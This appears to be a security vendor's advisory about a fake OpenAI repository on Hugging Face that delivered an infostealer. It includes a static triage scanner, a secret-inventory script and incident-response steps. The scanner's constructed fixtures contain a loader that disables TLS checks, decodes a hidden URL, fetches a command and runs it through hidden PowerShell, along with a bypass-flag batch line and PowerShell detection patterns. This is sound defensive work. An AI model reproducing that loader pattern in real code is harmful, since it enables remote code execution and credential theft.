A fake OpenAI repository on Hugging Face is a real supply-chain risk, not just a branding mistake. In May 2026, HiddenLayer researchers reported that a repository named Open-OSS/privacy-filter copied OpenAI’s legitimate Privacy Filter model card and used local scripts to run an infostealer on Windows systems.
What was dangerous?
- The repo impersonated an OpenAI privacy-filter project.
- Users were pushed to run start.bat or loader.py.
- The loader fetched a hidden PowerShell command and downloaded a second-stage payload.
- The final payload was an infostealer targeting browser data, tokens, wallets, SSH keys, and project secrets.
- Opening the page is much lower risk than cloning the repo and executing its code.
What happened with the fake OpenAI Hugging Face repo?
The malicious repository used trust signals that developers recognize: a familiar AI brand, a plausible privacy tool, copied documentation, and visible popularity. HiddenLayer said the repository appeared near the top of Hugging Face trending and used inflated-looking engagement to look legitimate. The dangerous part was not the model-card text; it was the local execution path.
| Signal | What it means for users |
|---|---|
| Unofficial namespace | A trusted brand name does not prove the repo is maintained by that brand. |
| Launcher scripts such as loader.py or start.bat | Repo code can download payloads, change settings, or run hidden commands. |
| Copied README/model card | Attackers can copy documentation faster than users can verify the maintainer. |
| High download/like count | Popularity can be manipulated and should not replace code review. |
| Encoded URLs or PowerShell | Hidden network stages are a strong warning sign for a model repo. |
How the attack chain worked
HiddenLayer’s analysis describes a staged loader. The Python file first displayed decoy AI-style behavior, then called a hidden function that disabled TLS certificate verification (so the fetch succeeds whatever certificate the remote host presents), decoded an obfuscated remote URL, fetched a command from it, and passed that command to PowerShell. On Windows, the command could launch a hidden second-stage script and run the stealer without showing a normal installer window. Because the stealer is fetched at run time, the repository itself holds only the downloader: reviewing the visible files shows the hook, not the payload, and the operator can swap the payload server-side without touching the repo.
This is why AI repositories must be treated like software packages. A model card may be harmless to read, but a helper script can do anything the current user account is allowed to do.
What can an AI-themed infostealer take?
- Saved browser passwords, cookies, and session tokens.
- OpenAI, Hugging Face, GitHub, cloud, CI/CD, and package-registry tokens.
- SSH keys, .env files, API keys, and local project secrets.
- Crypto wallets, wallet extensions, and seed phrases.
- Discord tokens, FTP/VPN credentials, and other developer workstation data.
How to check an AI repo before running it
- Confirm the official organization and maintainer history.
- Read launcher scripts before running them.
- Search for encoded strings, PowerShell calls, unexpected downloads, and disabled certificate checks.
- Run unfamiliar demos in a disposable VM with no production tokens.
- Use low-scope test API keys and revoke them after the test.
- Do not paste secrets into a model demo or notebook you have not reviewed.
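The following is an added example, not HiddenLayer's tooling and not code from the repository the article describes. It turns the review steps above, and the attack chain described earlier, into a static triage script you can run over a cloned checkout before executing anything: Python files are parsed with the standard `ast` module and checked for disabled certificate verification, decoder calls, network fetches, command execution with PowerShell-style arguments, and base64 literals that decode to URLs; .bat/.ps1/.sh launchers are pattern-matched for PowerShell and download indicators. The `FIXTURES` at the bottom are constructed to exercise the checks (the encoded string decodes to a reserved .invalid host) and are only parsed, never run. The indicator lists are a starting point for a manual review, not a complete signature set.

```python
"""Static triage of a cloned model repo for loader-style behaviour. Added example, not
HiddenLayer's tooling or code from the repo in the article; FIXTURES are constructed."""
import ast
import base64
import re
from pathlib import Path
from typing import Dict, List

TLS_DISABLE = {"_create_unverified_context", "_create_default_https_context"}
DECODERS = {"b64decode", "b32decode", "b85decode", "unhexlify", "decompress"}
DOWNLOADERS = {"urlopen", "urlretrieve"}  # plus anything called on requests./httpx.
EXEC_FUNCS = {"system", "popen", "run", "Popen", "call", "check_call", "check_output", "exec", "eval"}
# Indicators for .bat/.ps1/.sh launchers and for string arguments handed to EXEC_FUNCS.
LAUNCHER_RE = re.compile(
    r"powershell|pwsh|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|"
    r"invoke-expression|downloadstring|executionpolicy\s+bypass|\bcurl\b|\bwget\b", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def _dotted(node: ast.AST) -> str:
    """'ssl._create_unverified_context' for a Name/Attribute chain, '' for anything else."""
    parts: List[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def _decoded_url(literal: str) -> str:
    """The decoded text if a base64 literal hides an http(s) URL, else ''."""
    if not B64_RE.fullmatch(literal):
        return ""
    try:
        text = base64.b64decode(literal, validate=True).decode("utf-8", "ignore")
    except ValueError:
        return ""
    return text if text.lower().startswith(("http://", "https://")) else ""

def _string_args(call: ast.Call) -> str:
    # String literals in positional args, flattening one level of list/tuple.
    elts = [e for a in call.args for e in (a.elts if isinstance(a, (ast.List, ast.Tuple)) else [a])]
    return " ".join(e.value for e in elts if isinstance(e, ast.Constant) and isinstance(e.value, str))

def scan_python(source: str, name: str = "<py>") -> List[str]:
    """Flag TLS bypass, decoders, downloads, command execution and hidden URLs in Python source."""
    found: List[str] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign):  # e.g. ssl._create_default_https_context = ssl._create_unverified_context
            if any(_dotted(t).split(".")[-1] in TLS_DISABLE for t in node.targets):
                found.append(f"{name}:{node.lineno} TLS verification disabled (monkeypatch)")
        elif isinstance(node, ast.Call):
            fn = _dotted(node.func)
            last = fn.split(".")[-1]
            kw = {k.arg: getattr(k.value, "value", None) for k in node.keywords}
            if last in TLS_DISABLE or kw.get("verify") is False:
                found.append(f"{name}:{node.lineno} TLS verification disabled in {fn}()")
            if last in DECODERS:
                found.append(f"{name}:{node.lineno} obfuscated data decoded via {fn}()")
            if last in DOWNLOADERS or fn.startswith(("requests.", "httpx.")):
                found.append(f"{name}:{node.lineno} network fetch via {fn}()")
            if last in EXEC_FUNCS:
                args = _string_args(node)
                tag = "launcher-style command" if LAUNCHER_RE.search(args) else "external command"
                found.append(f"{name}:{node.lineno} {tag} via {fn}() args='{args}'")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = _decoded_url(node.value)
            if url:
                found.append(f"{name}:{node.lineno} base64 literal decodes to URL {url}")
    return found

def triage(files: Dict[str, str]) -> Dict[str, List[str]]:
    """files: relative path -> contents (e.g. collected with Path.rglob over a checkout).
    Returns findings per file; an empty dict means nothing was flagged."""
    report: Dict[str, List[str]] = {}
    for rel, text in files.items():
        suffix = Path(rel).suffix.lower()
        if suffix == ".py":
            try:
                found = scan_python(text, rel)
            except SyntaxError:
                found = [f"{rel}: unparsable Python, review by hand"]
        elif suffix in {".bat", ".cmd", ".ps1", ".sh"}:
            found = [f"{rel}:{i} launcher indicator: {line.strip()[:80]}"
                     for i, line in enumerate(text.splitlines(), 1) if LAUNCHER_RE.search(line)]
        else:
            continue
        if found:
            report[rel] = found
    return report

# Constructed fixtures modelled on the behaviour the article describes; the encoded
# string decodes to a reserved .invalid host and nothing here is ever executed.
FIXTURES = {
    "loader.py": '''
import base64, ssl, subprocess, urllib.request
def run_privacy_filter(text):  # decoy "AI" behaviour the user sees
    return text.replace("@", "[at]")
def _update():  # the part the user never sees
    ssl._create_default_https_context = ssl._create_unverified_context
    url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdXBkYXRl").decode()
    cmd = urllib.request.urlopen(url).read().decode()
    subprocess.run(["powershell", "-w", "hidden", "-c", cmd])
''',
    "start.bat": "@echo off\r\npython loader.py\r\npowershell -ExecutionPolicy Bypass -w hidden -enc QQBCAEMA\r\n",
    "demo.py": "def run_privacy_filter(text):\n    return text.replace('@', '[at]')\n",
}
```

`triage(FIXTURES)` flags loader.py and start.bat and leaves demo.py alone. To run it over a real clone, build the `files` mapping with `Path.rglob` while skipping `.git`, then read every hit by hand: the point of the `ast` pass is that it sees a `subprocess.run` or a certificate monkeypatch even when the strings around it are obfuscated, which a plain grep for "powershell" would miss.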
What to do if you ran the fake AI tool
If you cloned the fake repo and ran start.bat, loader.py, or another executable from it, treat the workstation as compromised. Do not sign in to important accounts from that device until it is cleaned or rebuilt.
- Disconnect the system from sensitive networks.
- From a clean device, revoke API tokens for OpenAI, Hugging Face, GitHub, cloud providers, CI/CD, and package registries, and replace SSH keypairs, removing the old public keys from servers and hosting accounts.
- Rotate passwords and invalidate active sessions.
- Check browser profiles, wallet extensions, SSH folders, and project directories for exposed secrets.
- Run a full malware scan and review persistence points such as Startup, Task Scheduler, services, and recently created files.
- Consider a clean OS reinstall if credential theft is confirmed or you cannot trust the endpoint state.
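The revoke-and-rotate steps are only as complete as your list of what actually lived on the machine. The script below is an added example (not Gridinsoft's or HiddenLayer's code) that walks chosen directories, such as a copy of the suspect home folder and project tree, and groups hits by what has to be rotated: private-key headers, .env and credential-store files, and token shapes for a few providers. The token prefixes are assumptions about current formats and the sample tree built by `demo()` is constructed with obviously fake values; extend `TOKEN_PATTERNS` for the providers you use, and run it from a clean machine against a copy of the profile rather than on the compromised host.

```python
"""Inventory of secrets an infostealer could have read, grouped by what to revoke or
rotate. Added example (not Gridinsoft's or HiddenLayer's code); sample files are
constructed and the token shapes are assumptions about current provider formats."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Token shapes by provider (assumed current prefixes; extend for your own registries/clouds).
TOKEN_PATTERNS = {
    "OpenAI API key": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}"),
    "Hugging Face token": re.compile(r"\bhf_[A-Za-z0-9]{20,}"),
    "GitHub token": re.compile(r"\b(?:ghp|gho|ghs|ghr)_[A-Za-z0-9]{20,}|\bgithub_pat_[A-Za-z0-9_]{20,}"),
    "AWS access key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "npm registry token": re.compile(r"_authToken\s*=\s*\S+"),
}
PRIVATE_KEY = re.compile(r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----")
# Files that imply a credential store regardless of content.
CREDENTIAL_FILES = {".git-credentials", ".npmrc", ".pypirc", "credentials", "kubeconfig"}
SKIP_DIRS = {".git", "node_modules", ".venv", "__pycache__"}


def classify(path: Path, text: str) -> List[str]:
    """Rotation categories implicated by one file (empty list = nothing to rotate)."""
    cats: List[str] = []
    if PRIVATE_KEY.search(text):
        cats.append("SSH/TLS private key: replace the keypair and remove the old public key everywhere")
    if path.name == ".env" or path.name.startswith(".env."):
        cats.append(".env file: rotate every value in it")
    if path.name in CREDENTIAL_FILES:
        cats.append(f"credential store {path.name}: revoke the stored credentials")
    for label, pattern in TOKEN_PATTERNS.items():
        if pattern.search(text):
            cats.append(f"{label}: revoke in the provider console, then issue a new one")
    return cats


def inventory(roots: List[Path], max_bytes: int = 1_000_000) -> Dict[str, List[str]]:
    """Map each rotation category to the files (relative to their root) that triggered it."""
    report: Dict[str, List[str]] = {}
    for root in roots:
        for path in sorted(root.rglob("*")):
            if not path.is_file() or SKIP_DIRS & set(path.parts) or path.stat().st_size > max_bytes:
                continue
            text = path.read_text(encoding="utf-8", errors="ignore")
            for cat in classify(path, text):
                report.setdefault(cat, []).append(path.relative_to(root).as_posix())
    return report


def demo() -> Dict[str, List[str]]:
    """Build a constructed home/project tree with obviously fake secrets and inventory it."""
    with tempfile.TemporaryDirectory() as d:
        home = Path(d)
        (home / ".ssh").mkdir()
        (home / ".ssh" / "id_ed25519").write_text(
            "-----BEGIN OPENSSH PRIVATE KEY-----\nfake\n-----END OPENSSH PRIVATE KEY-----\n")
        (home / ".git-credentials").write_text("https://dev:" + "ghp_EXAMPLE" + "0" * 20 + "@github.com\n")
        proj = home / "projects" / "privacy-filter"
        proj.mkdir(parents=True)
        (proj / ".env").write_text("OPENAI_API_KEY=" + "sk-EXAMPLE" + "0" * 20 + "\n"
                                   "HF_TOKEN=" + "hf_EXAMPLE" + "0" * 20 + "\n")
        (proj / "notebook.py").write_text("aws_key = 'AKIAEXAMPLE000000000'  # constructed\n")
        (proj / "README.md").write_text("# privacy-filter demo\n")
        return inventory([home])


if __name__ == "__main__":
    for category, files in demo().items():
        print(f"{category}\n    " + "\n    ".join(files))
```

The output is a checklist keyed by action, which is what you need when working through provider consoles from a clean device. Matching on file names as well as content matters because a stealer copies whole files: a `.git-credentials` or `.npmrc` is worth revoking even if its token format is not in the pattern table.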
After uninstalling the suspicious app or deleting the visible threat, use Gridinsoft Anti-Malware to check hidden files, startup entries, scheduled tasks, bundled apps, browser changes, and other persistence points that can restore malware.
FAQ
Can a Hugging Face repo be malicious?
Yes. Hugging Face hosts many legitimate projects, but an attacker can still upload a fake repo, copied model card, malicious script, or poisoned artifact.
Is opening the repository page enough to infect me?
Usually no. The higher risk begins when you clone the repo, run scripts, install dependencies, open a notebook with executable code, or launch binaries.
Why do attackers impersonate OpenAI?
OpenAI branding makes a repo look familiar. That can push developers to run code quickly before verifying the account, script behavior, or provenance.
Should I rotate API keys after running a fake repo?
Yes. If the tool had access to your local environment, rotate API keys, cloud tokens, GitHub tokens, SSH keys, and any secrets stored near the project.


